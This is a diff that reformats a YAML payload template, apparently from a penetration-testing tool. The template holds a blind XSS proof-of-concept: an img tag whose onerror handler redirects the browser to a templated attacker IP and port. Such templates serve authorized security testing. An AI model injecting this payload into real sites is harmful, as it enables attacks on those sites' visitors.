--- a/src/profi/templates/payloads/xss-blind-img-onerror-poc-callback.yaml
+++ b/src/profi/templates/payloads/xss-blind-img-onerror-poc-callback.yaml
@@ -1,11 +1,9 @@
+---
 metadata:
-  filename: xss-blind-img-onerror-poc-callback.yaml
-  tags:
-  - web
-  - xss
-  created: '2025-03-29'
-  author: Unknown
-content: '<img src=x onerror="document.location=''http://{{ attacker_ip }}:{{ delivery_outbound_port
-  }}/test''"/>
+  filename: "xss-blind-img-onerror-poc-callback.yaml"
+  tags: ["web", "xss"]
+  created: "2025-03-29"
+  author: "Unknown"
 
-  '
+content: |
+  <img src=x onerror="document.location='http://{{ attacker_ip }}:{{ delivery_outbound_port }}/test'"/>
